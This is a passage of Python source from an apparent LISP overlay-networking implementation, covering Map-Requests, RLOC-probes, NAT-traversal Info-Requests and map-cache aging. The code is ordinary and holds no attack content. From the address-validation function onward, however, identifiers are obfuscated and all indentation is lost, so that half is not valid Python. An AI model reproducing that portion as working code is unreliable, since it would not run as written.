    rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)

    if (rate_limit):
        dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format(
            green(dest.print_address(), False), round(elapsed, 3)))
    return(rate_limit)
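#
# lisp_send_map_request
#
# Build and send a Map-Request for 'deid'. When 'rloc' is supplied this is
# an RLOC-probe sent directly (or encapsulated to an ETR behind a NAT);
# otherwise the request goes to a map-resolver inside an ECM. NAT-traversal
# substitutes translated RLOCs into the ITR-RLOCs list, and 'pubsub'
# requests a subscription.
#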
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc,
    pubsub=False):
    global lisp_last_map_request_sent

    #
    # For an RLOC-probe, note the probed RLOC and the port to send to.
    #
    probe_dest = probe_port = None
    if (rloc):
        probe_dest = rloc.rloc
        probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT

    #
    # We need our own RLOCs for the ITR-RLOCs list.
    #
    itr_rloc4, itr_rloc6, device = lisp_myrlocs
    if (itr_rloc4 == None):
        lprint("Suppress sending Map-Request, IPv4 RLOC not found")
        return

    if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
        lprint("Suppress sending Map-Request, IPv6 RLOC not found")
        return

    map_request = lisp_map_request()
    map_request.record_count = 1
    map_request.nonce = lisp_get_control_nonce()
    map_request.rloc_probe = (probe_dest != None)
    map_request.subscribe_bit = pubsub
    map_request.xtr_id_present = pubsub

    if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce

    multicast = deid.is_multicast_address()
    if (multicast):
        map_request.target_eid = seid
        map_request.target_group = deid
    else:
        map_request.target_eid = deid

    #
    # Sign the Map-Request when a signature-EID is configured (not for
    # RLOC-probes).
    #
    if (map_request.rloc_probe == False):
        db = lisp_get_signature_eid()
        if (db):
            map_request.signature_eid.copy_address(db.eid)
            map_request.privkey_filename = "./lisp-sig.pem"

    if (seid == None or multicast):
        map_request.source_eid.afi = LISP_AFI_NONE
    else:
        map_request.source_eid = seid

    #
    # When behind a NAT and probing a public RLOC, use our translated RLOC
    # as the ITR-RLOC, presumably so the probe reply returns through the NAT.
    #
    if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
        if (probe_dest.is_private_address() == False):
            itr_rloc4 = lisp_get_any_translated_rloc()
        if (itr_rloc4 == None):
            lprint("Suppress sending Map-Request, translated RLOC not found")
            return

    #
    # Build the ITR-RLOCs list.
    #
    if (probe_dest == None or probe_dest.is_ipv4()):
        if (lisp_nat_traversal and probe_dest == None):
            translated = lisp_get_any_translated_rloc()
            if (translated != None): itr_rloc4 = translated
        map_request.itr_rlocs.append(itr_rloc4)

    if (probe_dest == None or probe_dest.is_ipv6()):
        if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
            itr_rloc6 = None
        else:
            map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
            map_request.itr_rlocs.append(itr_rloc6)

    #
    # Choose the inner source address for the ECM.
    #
    if (probe_dest != None and map_request.itr_rlocs != []):
        itr_rloc = map_request.itr_rlocs[0]
    else:
        if (deid.is_ipv4()):
            itr_rloc = itr_rloc4
        elif (deid.is_ipv6()):
            itr_rloc = itr_rloc6
        else:
            itr_rloc = itr_rloc4

    packet = map_request.encode(probe_dest, probe_port)
    map_request.print_map_request()

    #
    # RLOC-probes are sent directly, or encapsulated when the probed ETR
    # sits behind a NAT.
    #
    if (probe_dest != None):
        if (rloc.is_rloc_translated()):
            nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)

            #
            # Gleaned RLOCs may have no NAT state; synthesize it.
            #
            if (nat_info == None):
                addr_str = rloc.rloc.print_address_no_iid()
                hostname = "gleaned-{}".format(addr_str)
                port = rloc.translated_port
                nat_info = lisp_nat_info(addr_str, hostname, port)
            lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
                packet)
            return

        address = probe_dest.print_address_no_iid()
        dest = lisp_convert_4to6(address)
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
        return

    #
    # Otherwise pick a map-resolver and send the Map-Request inside an ECM.
    #
    lookup_seid = None if lisp_i_am_rtr else seid
    if (lisp_decent_pull_xtr_configured()):
        mr = lisp_get_decent_map_resolver(deid)
    else:
        mr = lisp_get_map_resolver(None, lookup_seid)

    if (mr == None):
        lprint("Cannot find Map-Resolver for source-EID {}".format(
            green(seid.print_address(), False)))
        return

    mr.last_used = lisp_get_timestamp()
    mr.map_requests_sent += 1
    if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce

    if (seid == None): seid = itr_rloc
    lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
        mr.map_resolver)

    lisp_last_map_request_sent = lisp_get_timestamp()

    #
    # Refresh the map-resolver's DNS name in case its address changed.
    #
    mr.resolve_dns_name()
    return
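#
# lisp_send_info_request
#
# Build and send a NAT-traversal Info-Request to an RTR (data port) or a
# map-server (control port). When a device name is supplied, a host route
# to the destination is temporarily installed out that interface so the
# request leaves via the RLOC being tested, then removed afterwards.
#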
def lisp_send_info_request(lisp_sockets, dest, port, device_name):

    #
    # Build the Info-Request, qualifying the hostname with the device name
    # so multiple interfaces on one xTR can be told apart.
    #
    info = lisp_info()
    info.nonce = lisp_get_control_nonce()
    if (device_name): info.hostname += "-" + device_name

    dest_str = dest.print_address_no_iid()

    #
    # When the request must leave a specific interface, install a host route
    # to the destination out that interface. For the control port, wait for
    # any previously installed host route to go away first.
    #
    installed_host_route = False
    if (device_name):
        nh = lisp_get_host_route_next_hop(dest_str)

        if (port == LISP_CTRL_PORT and nh != None):
            while (True):
                time.sleep(.01)
                nh = lisp_get_host_route_next_hop(dest_str)
                if (nh == None): break

        default_routes = lisp_get_default_route_next_hops()
        for device, gw in default_routes:
            if (device != device_name): continue

            #
            # Replace any existing host route with one out this device.
            #
            if (nh != gw):
                if (nh != None):
                    lisp_install_host_route(dest_str, nh, False)
                lisp_install_host_route(dest_str, gw, True)
                installed_host_route = True
            break

    #
    # Encode and log the Info-Request.
    #
    packet = info.encode()
    info.print_info()

    which = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
    which = bold(which, False)
    port_str = bold("{}".format(port), False)
    dest_pretty = red(dest_str, False)
    node = "RTR " if port == LISP_DATA_PORT else "MS "
    lprint("Send Info-Request to {}{}, port {} {}".format(node, dest_pretty,
        port_str, which))

    #
    # Info-Requests to the data port are prepended with a LISP data header
    # carrying instance-id 0xffffff.
    #
    if (port == LISP_CTRL_PORT):
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    else:
        header = lisp_data_header()
        header.instance_id(0xffffff)
        header = header.encode()
        if (header):
            packet = header + packet
            lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)

    #
    # Remove the temporary host route, restoring the previous one if any.
    #
    if (installed_host_route):
        lisp_install_host_route(dest_str, None, False)
        if (nh != None): lisp_install_host_route(dest_str, nh, True)
    return
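#
# lisp_process_info_request
#
# Parse a received Info-Request, turn it into an Info-Reply that echoes the
# requester's global (translated) RLOC and port plus our RTR list, send it
# back, and cache the requester as an info-source.
#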
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):

    #
    # Parse the Info-Request.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return
    info.print_info()

    #
    # Convert it into an Info-Reply carrying the requester's translated
    # address and port as seen by us.
    #
    info.info_reply = True
    info.global_etr_rloc.store_address(addr_str)
    info.etr_port = sport

    #
    # Echo the hostname back as a distinguished-name private RLOC.
    #
    if (info.hostname != None):
        info.private_etr_rloc.afi = LISP_AFI_NAME
        info.private_etr_rloc.store_address(info.hostname)

    if (rtr_list != None): info.rtr_list = rtr_list
    packet = info.encode()
    info.print_info()

    #
    # Send the Info-Reply back to the Info-Request's source port.
    #
    lprint("Send Info-Reply to {}".format(red(addr_str, False)))
    dest = lisp_convert_4to6(addr_str)
    lisp_send(lisp_sockets, dest, sport, packet)

    #
    # Cache the requester so control messages can be forwarded to it later.
    #
    info_source = lisp_info_source(info.hostname, addr_str, sport)
    info_source.cache_address_for_info_source()
    return
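#
# lisp_get_signature_eid
#
# Return the first database-mapping configured with a signature-eid, or None.
#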
def lisp_get_signature_eid():
    for db in lisp_db_list:
        if (db.signature_eid): return(db)
    return(None)
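#
# lisp_get_any_translated_port
#
# Return the first translated port found in any database-mapping RLOC, or
# None when no NAT translation has been discovered.
#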
def lisp_get_any_translated_port():
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.translated_rloc.is_null()): continue
            return(rloc_entry.translated_port)
    return(None)
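#
# lisp_get_any_translated_rloc
#
# Return the first translated RLOC found in any database-mapping, or None.
#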
def lisp_get_any_translated_rloc():
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.translated_rloc.is_null()): continue
            return(rloc_entry.translated_rloc)
    return(None)
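#
# lisp_get_all_translated_rlocs
#
# Return a list of all translated RLOC address strings from the
# database-mappings.
#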
def lisp_get_all_translated_rlocs():
    rloc_list = []
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.is_rloc_translated() == False): continue
            address = rloc_entry.translated_rloc.print_address_no_iid()
            rloc_list.append(address)
    return(rloc_list)
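#
# lisp_update_default_routes
#
# Install default map-cache entries (IPv4, IPv6, and MAC when L2 overlays
# are enabled) whose RLOC-set is the supplied RTR list, so traffic defaults
# to the RTRs. Private RTR addresses are ignored when the RTR is known to be
# behind a NAT. Existing entries are replaced only when their RLOC-set
# changed.
#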
def lisp_update_default_routes(map_resolver, iid, rtr_list):
    ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    #
    # Filter out private RTR addresses when the RTR is behind a NAT.
    #
    new_rtr_list = {}
    for key in rtr_list:
        if (key == None): continue
        address = rtr_list[key]
        if (ignore_private and address.is_private_address()): continue
        new_rtr_list[key] = address
    rtr_list = new_rtr_list

    #
    # Build the list of default EID-prefixes, deleting stale map-cache
    # entries whose RTR RLOC-set changed.
    #
    eid_list = []
    for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
        if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break

        #
        # Unicast default route.
        #
        eid = lisp_address(afi, "", 0, iid)
        eid.make_default_route(eid)
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc):
            if (mc.checkpoint_entry):
                lprint("Updating checkpoint entry for {}".format(
                    green(mc.print_eid_tuple(), False)))
            elif (mc.do_rloc_sets_match(list(rtr_list.values()))):
                continue
            mc.delete_cache()

        eid_list.append([eid, ""])

        #
        # Multicast default route.
        #
        geid = lisp_address(afi, "", 0, iid)
        geid.make_default_multicast_route(geid)
        gmc = lisp_map_cache.lookup_cache(geid, True)
        if (gmc): gmc = gmc.source_cache.lookup_cache(eid, True)
        if (gmc): gmc.delete_cache()

        eid_list.append([eid, geid])

    if (len(eid_list) == 0): return

    #
    # Build an RLOC-set of the RTRs, priority 254.
    #
    rloc_set = []
    for rtr in rtr_list:
        rtr_addr = rtr_list[rtr]
        rloc = lisp_rloc()
        rloc.rloc.copy_address(rtr_addr)
        rloc.priority = 254
        rloc.mpriority = 255
        rloc.rloc_name = "RTR"
        rloc_set.append(rloc)

    #
    # Add a map-cache entry per default prefix; each entry gets its own
    # copy of the RLOC-set.
    #
    for eid in eid_list:
        mc = lisp_mapping(eid[0], eid[1], rloc_set)
        mc.mapping_source = map_resolver
        mc.map_cache_ttl = LISP_MR_TTL * 60
        mc.add_cache()
        lprint("Add {} to map-cache with RTR RLOC-set: {}".format(
            green(mc.print_eid_tuple(), False), list(rtr_list.keys())))

        rloc_set = copy.deepcopy(rloc_set)
    return
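#
# lisp_process_info_reply
#
# Process a received Info-Reply. Merge the advertised RTR list into
# lisp_rtr_list, refresh ITR default routes when new RTRs appear, and, when
# 'store' is True, record the global RLOC and port as NAT translations on
# matching database-mapping RLOCs. Returns [global-rloc, port, new-rtr-set].
#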
def lisp_process_info_reply(source, packet, store):

    #
    # Parse the Info-Reply.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return([None, None, False])

    info.print_info()

    #
    # Merge the advertised RTRs into lisp_rtr_list.
    #
    rtr_changed = False
    for rtr in info.rtr_list:
        addr_str = rtr.print_address_no_iid()
        if (addr_str in lisp_rtr_list):
            if (lisp_register_all_rtrs == False): continue
            if (lisp_rtr_list[addr_str] != None): continue
        rtr_changed = True
        lisp_rtr_list[addr_str] = rtr

    #
    # An ITR refreshes its default routes when the RTR set changed.
    #
    if (lisp_i_am_itr and rtr_changed):
        if (lisp_iid_to_interface == {}):
            lisp_update_default_routes(source, lisp_default_iid,
                lisp_rtr_list)
        else:
            for iid in list(lisp_iid_to_interface.keys()):
                lisp_update_default_routes(source, int(iid), lisp_rtr_list)

    #
    # Callers that only want the translation information stop here.
    #
    if (store == False):
        return([info.global_etr_rloc, info.etr_port, rtr_changed])

    #
    # Store the translated RLOC and port on every local database-mapping
    # RLOC that matches the Info-Reply's private RLOC.
    #
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            rloc = rloc_entry.rloc
            interface = rloc_entry.interface
            if (interface == None):
                if (rloc.is_null()): continue
                if (rloc.is_local() == False): continue
                if (info.private_etr_rloc.is_null() == False and
                    rloc.is_exact_match(info.private_etr_rloc) == False):
                    continue
            elif (info.private_etr_rloc.is_dist_name()):
                rloc_name = info.private_etr_rloc.address
                if (rloc_name != rloc_entry.rloc_name): continue

            eid_str = green(db.eid.print_prefix(), False)
            rloc_str = red(rloc.print_address_no_iid(), False)

            no_nat = info.global_etr_rloc.is_exact_match(rloc)
            if (rloc_entry.translated_port == 0 and no_nat):
                lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
                    interface, eid_str))
                continue

            #
            # Skip when the translation is unchanged.
            #
            global_rloc = info.global_etr_rloc
            translated = rloc_entry.translated_rloc
            if (translated.is_exact_match(global_rloc) and
                info.etr_port == rloc_entry.translated_port): continue

            lprint("Store translation {}:{} for {} ({}), EID-prefix {}".\
                format(red(info.global_etr_rloc.print_address_no_iid(),
                False), info.etr_port, rloc_str, interface, eid_str))

            rloc_entry.store_translated_rloc(info.global_etr_rloc,
                info.etr_port)

    return([info.global_etr_rloc, info.etr_port, rtr_changed])
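#
# lisp_test_mr
#
# Periodic map-resolver test: send Map-Requests for fixed IPv4 and IPv6 test
# EIDs and reschedule itself. Note the function returns immediately at the
# top, so the test logic below is currently disabled.
#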
def lisp_test_mr(lisp_sockets, port):
    return

    #
    # Unreachable by design; remove the return above to re-enable testing.
    #
    lprint("Test Map-Resolvers")

    eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
    eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)

    #
    # Send IPv4 Map-Requests.
    #
    eid.store_address("10.0.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid, None)
    eid.store_address("192.168.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid, None)

    #
    # Send IPv6 Map-Requests.
    #
    eid6.store_address("0100::1")
    lisp_send_map_request(lisp_sockets, port, None, eid6, None)
    eid6.store_address("8000::1")
    lisp_send_map_request(lisp_sockets, port, None, eid6, None)

    #
    # Reschedule the test.
    #
    test_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
        [lisp_sockets, port])
    test_timer.start()
    return
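#
# lisp_update_local_rloc
#
# Re-read the interface address behind an "interface = <device>" RLOC and,
# when it changed (say via DHCP), update the RLOC and lisp_myrlocs.
#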
def lisp_update_local_rloc(rloc):
    if (rloc.interface == None): return

    address = lisp_get_interface_address(rloc.interface)
    if (address == None): return

    old_addr = rloc.rloc.print_address_no_iid()
    new_addr = address.print_address_no_iid()

    if (old_addr == new_addr): return

    lprint("Local interface address changed on {} from {} to {}".format(
        rloc.interface, old_addr, new_addr))

    rloc.rloc.copy_address(address)
    lisp_myrlocs[0] = address
    return
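#
# lisp_update_encap_port
#
# For each RLOC of a map-cache entry, refresh the translated encapsulation
# port from the current NAT state for that RLOC's hostname.
#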
def lisp_update_encap_port(mc):
    for rloc in mc.rloc_set:
        nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
        if (nat_info == None): continue
        if (rloc.translated_port == nat_info.port): continue

        lprint(("Encap-port changed from {} to {} for RLOC {}, " +
            "EID-prefix {}").format(rloc.translated_port, nat_info.port,
            red(rloc.rloc.print_address_no_iid(), False),
            green(mc.print_eid_tuple(), False)))

        rloc.store_translated_rloc(rloc.rloc, nat_info.port)
    return
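#
# lisp_timeout_map_cache_entry
#
# Decide whether one map-cache entry has aged out. Entries with no TTL (and
# NAT-traversal default entries) never time out, but their encap ports are
# refreshed. Timed-out entries are appended to 'delete_list'; the caller
# removes them after the cache walk completes.
#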
def lisp_timeout_map_cache_entry(mc, delete_list):
    if (mc.map_cache_ttl == None):
        lisp_update_encap_port(mc)
        return([True, delete_list])

    now = lisp_get_timestamp()

    #
    # Entry is still fresh; refresh its encap port while we are here.
    #
    if (mc.last_refresh_time + mc.map_cache_ttl > now):
        if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
        return([True, delete_list])

    #
    # NAT-traversal default entries (0.0.0.0/0) are never timed out.
    #
    if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
        return([True, delete_list])

    #
    # Entry timed out; queue it for deletion.
    #
    elapsed = lisp_print_elapsed(mc.last_refresh_time)
    eid_str = mc.print_eid_tuple()
    lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}".\
        format(green(eid_str, False), bold("timed out", False), elapsed))

    delete_list.append(mc)
    return([True, delete_list])
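#
# lisp_timeout_map_cache_walk
#
# Cache-walk callback: apply lisp_timeout_map_cache_entry() to a unicast
# entry (and checkpoint survivors), or recurse into the source-cache of an
# (S,G) entry.
#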
def lisp_timeout_map_cache_walk(mc, parms):
    delete_list = parms[0]
    checkpoint_entries = parms[1]

    #
    # Unicast entries are checked directly; survivors are checkpointed.
    #
    if (mc.group.is_null()):
        status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
        if (delete_list == [] or mc != delete_list[-1]):
            checkpoint_entries = lisp_write_checkpoint_entry(
                checkpoint_entries, mc)
        return([status, parms])

    if (mc.source_cache == None): return([True, parms])

    #
    # (S,G) entries keep their sources in mc.source_cache; walk those too.
    #
    parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
    return([True, parms])
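#
# lisp_timeout_map_cache
#
# Walk the entire map-cache, deleting timed-out entries and writing a
# checkpoint file of the entries that remain.
#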
def lisp_timeout_map_cache(lisp_map_cache):
    parms = [[], []]
    parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)

    #
    # Delete the timed-out entries outside of the cache walk.
    #
    delete_list = parms[0]
    for mc in delete_list: mc.delete_cache()

    #
    # Checkpoint the surviving entries.
    #
    checkpoint_entries = parms[1]
    lisp_checkpoint(checkpoint_entries)
    return
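#
# lisp_store_nat_info
#
# Record NAT state (translated address and port) for an ETR hostname. The
# newest state is kept at the head of the lisp_nat_state_info[hostname]
# list. Returns True when the caller needs to act on a new or changed
# translation, False when the head entry was merely refreshed.
#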
def lisp_store_nat_info(hostname, rloc, port):
    addr_str = rloc.print_address_no_iid()
    msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
        blue(hostname, False), red(addr_str, False), port)

    new_nat_info = lisp_nat_info(addr_str, hostname, port)

    if (hostname not in lisp_nat_state_info):
        lisp_nat_state_info[hostname] = [new_nat_info]
        lprint(msg.format("Store initial"))
        return(True)

    #
    # If the head entry already matches, just refresh its uptime.
    #
    nat_info = lisp_nat_state_info[hostname][0]
    if (nat_info.address == addr_str and nat_info.port == port):
        nat_info.uptime = lisp_get_timestamp()
        lprint(msg.format("Refresh existing"))
        return(False)

    #
    # Otherwise look for a matching older entry and move it to the head.
    #
    old_entry = None
    for nat_info in lisp_nat_state_info[hostname]:
        if (nat_info.address == addr_str and nat_info.port == port):
            old_entry = nat_info
            break

    if (old_entry == None):
        lprint(msg.format("Store new"))
    else:
        lisp_nat_state_info[hostname].remove(old_entry)
        lprint(msg.format("Use previous"))

    existing = lisp_nat_state_info[hostname]
    lisp_nat_state_info[hostname] = [new_nat_info] + existing
    return(True)
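#
# lisp_get_nat_info
#
# Return the cached lisp_nat_info() entry for the given RLOC address and
# hostname, or None.
#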
def lisp_get_nat_info(rloc, hostname):
    if (hostname not in lisp_nat_state_info): return(None)

    addr_str = rloc.print_address_no_iid()
    for nat_info in lisp_nat_state_info[hostname]:
        if (nat_info.address == addr_str): return(nat_info)
    return(None)
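#
# lisp_build_info_requests
#
# When NAT-traversal is enabled, send Info-Requests for every local
# database-mapping RLOC that is bound to an interface. With no explicit
# destination, the requests go to all configured map-resolvers (or
# map-servers when no map-resolvers are configured).
#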
def lisp_build_info_requests(lisp_sockets, dest, port):
    if (lisp_nat_traversal == False): return

    #
    # Choose destinations: the supplied one, else all map-resolvers, else
    # all map-servers.
    #
    dest_list = []
    mr_list = []
    if (dest == None):
        for mr in list(lisp_map_resolvers_list.values()):
            mr_list.append(mr.map_resolver)
        dest_list = mr_list
        if (dest_list == []):
            for ms in list(lisp_map_servers_list.values()):
                dest_list.append(ms.map_server)
        if (dest_list == []): return
    else:
        dest_list.append(dest)

    #
    # Collect the local interface RLOCs from the database-mappings.
    #
    rloc_list = {}
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            lisp_update_local_rloc(rloc_entry)
            if (rloc_entry.rloc.is_null()): continue
            if (rloc_entry.interface == None): continue

            address = rloc_entry.rloc.print_address_no_iid()
            if (address in rloc_list): continue
            rloc_list[address] = rloc_entry.interface

    if (rloc_list == {}):
        lprint('Suppress Info-Request, no "interface = <device>" RLOC ' +
            "found in any database-mappings")
        return

    #
    # Send an Info-Request per RLOC to each destination.
    #
    for address in rloc_list:
        interface = rloc_list[address]
        addr_str = red(address, False)
        lprint("Build Info-Request for private address {} ({})".format(
            addr_str, interface))
        device = interface if len(rloc_list) > 1 else None
        for dest in dest_list:
            lisp_send_info_request(lisp_sockets, dest, port, device)

    #
    # Refresh map-resolver DNS names in case their addresses changed.
    #
    if (mr_list != []):
        for mr in list(lisp_map_resolvers_list.values()):
            mr.resolve_dns_name()
    return
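#
# lisp_valid_address_format
#
# Syntax-check an "address" value from a configuration command. Accepts
# quoted distinguished-names, dotted-quad IPv4, geo-coordinates (with
# N/S/W/E components), xxxx-xxxx-xxxx MAC addresses, colon-separated IPv6,
# and +<digits> E.164 numbers.
#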
def lisp_valid_address_format ( kw , value ) :
if ( kw != "address" ) : return ( True )
if ( value [ 0 ] == "'" and value [ - 1 ] == "'" ) : return ( True )
if ( value . find ( "." ) != - 1 ) :
IiI = value . split ( "." )
if ( len ( IiI ) != 4 ) : return ( False )
for OoiIiiIi11 in IiI :
if ( OoiIiiIi11 . isdigit ( ) == False ) : return ( False )
if ( int ( OoiIiiIi11 ) > 255 ) : return ( False )
return ( True )
if ( value . find ( "-" ) != - 1 ) :
IiI = value . split ( "-" )
for iIi1iIIIiIiI in [ "N" , "S" , "W" , "E" ] :
if ( iIi1iIIIiIiI in IiI ) :
if ( len ( IiI ) < 8 ) : return ( False )
return ( True )
if ( value . find ( "-" ) != - 1 ) :
IiI = value . split ( "-" )
if ( len ( IiI ) != 3 ) : return ( False )
for O00OoO in IiI :
try : int ( O00OoO , 16 )
except : return ( False )
return ( True )
if ( value . find ( ":" ) != - 1 ) :
IiI = value . split ( ":" )
if ( len ( IiI ) < 2 ) : return ( False )
OOO0OoOO0O = False
O0oo0oOo = 0
for O00OoO in IiI :
O0oo0oOo += 1
if ( O00OoO == "" ) :
if ( OOO0OoOO0O ) :
if ( len ( IiI ) == O0oo0oOo ) : break
if ( O0oo0oOo > 2 ) : return ( False )
OOO0OoOO0O = True
continue
try : int ( O00OoO , 16 )
except : return ( False )
return ( True )
if ( value [ 0 ] == "+" ) :
IiI = value [ 1 : : ]
for o0o00O0OO0O0O in IiI :
if ( o0o00O0OO0O0O . isdigit ( ) == False ) : return ( False )
return ( True )
return ( False )
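#
# lisp_process_api
#
# Process an API request of the form "<name>%<json-parameters>". Dispatch
# to the map-cache, site-cache, site-cache-summary, map-server,
# map-resolver, or database-mapping handler, then return the JSON-encoded
# result to the lisp-core process over the IPC socket.
#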
def lisp_process_api ( process , lisp_socket , data_structure ) :
iIOooo00OO , I1iII1IIi1IiI = data_structure . split ( "%" )
lprint ( "Process API request '{}', parameters: '{}'" . format ( iIOooo00OO ,
I1iII1IIi1IiI ) )
iiooo0o0oO = [ ]
if ( iIOooo00OO == "map-cache" ) :
if ( I1iII1IIi1IiI == "" ) :
iiooo0o0oO = lisp_map_cache . walk_cache ( lisp_process_api_map_cache , iiooo0o0oO )
else :
iiooo0o0oO = lisp_process_api_map_cache_entry ( json . loads ( I1iII1IIi1IiI ) )
if ( iIOooo00OO == "site-cache" ) :
if ( I1iII1IIi1IiI == "" ) :
iiooo0o0oO = lisp_sites_by_eid . walk_cache ( lisp_process_api_site_cache ,
iiooo0o0oO )
else :
iiooo0o0oO = lisp_process_api_site_cache_entry ( json . loads ( I1iII1IIi1IiI ) )
if ( iIOooo00OO == "site-cache-summary" ) :
iiooo0o0oO = lisp_process_api_site_cache_summary ( lisp_sites_by_eid )
if ( iIOooo00OO == "map-server" ) :
I1iII1IIi1IiI = { } if ( I1iII1IIi1IiI == "" ) else json . loads ( I1iII1IIi1IiI )
iiooo0o0oO = lisp_process_api_ms_or_mr ( True , I1iII1IIi1IiI )
if ( iIOooo00OO == "map-resolver" ) :
I1iII1IIi1IiI = { } if ( I1iII1IIi1IiI == "" ) else json . loads ( I1iII1IIi1IiI )
iiooo0o0oO = lisp_process_api_ms_or_mr ( False , I1iII1IIi1IiI )
if ( iIOooo00OO == "database-mapping" ) :
iiooo0o0oO = lisp_process_api_database_mapping ( )
iiooo0o0oO = json . dumps ( iiooo0o0oO )
OO = lisp_api_ipc ( process , iiooo0o0oO )
lisp_ipc ( OO , lisp_socket , "lisp-core" )
return
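#
# lisp_process_api_map_cache
#
# Walker callback to gather one map-cache entry. For (S,G) entries, walk
# the source-cache hanging off the group entry.
#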
def lisp_process_api_map_cache ( mc , data ) :
if ( mc . group . is_null ( ) ) : return ( lisp_gather_map_cache_data ( mc , data ) )
if ( mc . source_cache == None ) : return ( [ True , data ] )
data = mc . source_cache . walk_cache ( lisp_gather_map_cache_data , data )
return ( [ True , data ] )
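#
# lisp_gather_map_cache_data
#
# Serialize one map-cache entry (EID/group prefixes, uptime, action, TTL,
# and the RLOC-set, including any multicast RLOC-probe members) into a
# dictionary and append it to the supplied array.
#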
def lisp_gather_map_cache_data ( mc , data ) :
oo0O00OOOOO = { }
oo0O00OOOOO [ "instance-id" ] = str ( mc . eid . instance_id )
oo0O00OOOOO [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
if ( mc . group . is_null ( ) == False ) :
oo0O00OOOOO [ "group-prefix" ] = mc . group . print_prefix_no_iid ( )
oo0O00OOOOO [ "uptime" ] = lisp_print_elapsed ( mc . uptime )
oo0O00OOOOO [ "expires" ] = lisp_print_elapsed ( mc . uptime )
oo0O00OOOOO [ "action" ] = lisp_map_reply_action_string [ mc . action ]
oo0O00OOOOO [ "ttl" ] = "--" if mc . map_cache_ttl == None else str ( mc . map_cache_ttl / 60 )
OO00O000OOO = [ ]
for iIIiI11 in mc . rloc_set :
iiiI1I = lisp_fill_rloc_in_json ( iIIiI11 )
if ( iIIiI11 . rloc . is_multicast_address ( ) ) :
iiiI1I [ "multicast-rloc-set" ] = [ ]
for O0o00O00oo0oO in list ( iIIiI11 . multicast_rloc_probe_list . values ( ) ) :
iii1i = lisp_fill_rloc_in_json ( O0o00O00oo0oO )
iiiI1I [ "multicast-rloc-set" ] . append ( iii1i )
OO00O000OOO . append ( iiiI1I )
oo0O00OOOOO [ "rloc-set" ] = OO00O000OOO
data . append ( oo0O00OOOOO )
return ( [ True , data ] )
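#
# lisp_fill_rloc_in_json
#
# Build the JSON dictionary for one RLOC: address, encapsulation port and
# crypto state, up/down state, geo/ELP/RLE/JSON attributes, packet stats,
# priorities/weights, and RLOC-probe RTT, hop-count, and latency history.
#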
def lisp_fill_rloc_in_json ( rloc ) :
iiiI1I = { }
O0O0 = None
if ( rloc . rloc_exists ( ) ) :
iiiI1I [ "address" ] = rloc . rloc . print_address_no_iid ( )
O0O0 = iiiI1I [ "address" ]
if ( rloc . translated_port != 0 ) :
iiiI1I [ "encap-port" ] = str ( rloc . translated_port )
O0O0 += ":" + iiiI1I [ "encap-port" ]
if ( O0O0 and O0O0 in lisp_crypto_keys_by_rloc_encap ) :
III = lisp_crypto_keys_by_rloc_encap [ O0O0 ] [ 1 ]
if ( III != None and III . shared_key != None ) :
iiiI1I [ "encap-crypto" ] = "crypto-" + III . cipher_suite_string
iiiI1I [ "state" ] = rloc . print_state ( )
if ( rloc . geo ) : iiiI1I [ "geo" ] = rloc . geo . print_geo ( )
if ( rloc . elp ) : iiiI1I [ "elp" ] = rloc . elp . print_elp ( False )
if ( rloc . rle ) : iiiI1I [ "rle" ] = rloc . rle . print_rle ( False , False )
if ( rloc . json ) : iiiI1I [ "json" ] = rloc . json . print_json ( False )
if ( rloc . rloc_name ) : iiiI1I [ "rloc-name" ] = rloc . rloc_name
IIIii1i = rloc . stats . get_stats ( False , False )
if ( IIIii1i ) : iiiI1I [ "stats" ] = IIIii1i
iiiI1I [ "uptime" ] = lisp_print_elapsed ( rloc . uptime )
iiiI1I [ "upriority" ] = str ( rloc . priority )
iiiI1I [ "uweight" ] = str ( rloc . weight )
iiiI1I [ "mpriority" ] = str ( rloc . mpriority )
iiiI1I [ "mweight" ] = str ( rloc . mweight )
iIiiI11iIIi11 = rloc . last_rloc_probe_reply
if ( iIiiI11iIIi11 ) :
